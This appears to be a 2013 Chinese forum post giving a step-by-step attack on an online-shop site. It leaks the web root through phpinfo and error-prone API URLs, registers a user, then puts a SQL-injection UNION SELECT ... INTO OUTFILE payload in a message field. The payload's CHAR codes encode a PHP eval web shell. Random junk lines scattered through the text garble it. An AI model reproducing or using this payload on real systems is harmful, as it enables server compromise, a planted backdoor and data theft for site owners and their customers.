第一个:想办法找到目标网站的绝对路径
& N; }9 y3 P3 g5 A! t6 A- C! p# m5 ?4 O2 n- }" A) @; {
http://www.political-security.com/install/svinfo.php?phpinfo=true
. G; o: y7 W/ w" p" M8 N, b [1 C/ s2 F2 \0 F; x
http:/www.political-security.com/core/api/shop_api.php
& T! S, |- d, M- }
' E7 O. P+ D, Q. }7 x3 dhttp://www.political-security.co ... api_b2b_2_0_cat.php
* P, R. A$ Z, s, H; ?! N8 m- P
n2 ]$ u/ K! l. o0 O( T) l1 Yhttp://www.political-security.com/core/ap ... b_2_0_goodstype.php
' W; q+ u8 a% I+ Z( b3 C+ {9 c5 t
http://www.political-security.co ... i_b2b_2_0_brand.php
$ G- V: Q- L1 s3 ^$ i5 \- S) n第二个:注册一个普通用户$ V4 O9 c! h t
" d$ F7 ]* ^1 g6 V5 t
http://www.political-security.com/?passport-signup.html
7 B' c& C7 ?5 s R. G; G# c" }4 M7 c* v; |9 s O2 n
第三个: 发送消息 & M7 v$ B! c1 G, n9 w! G0 R; S
7 A7 W0 U" t/ h. P3 r8 Bhttp://www.political-security.com/?member-send.html$ h" h3 m1 ]8 P- W, Q- Z
发送给中填写
; h( U/ z# y- \0 p" L& h! Qantian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |
发表于 2013-2-27 21:28:28
收藏
支持
反对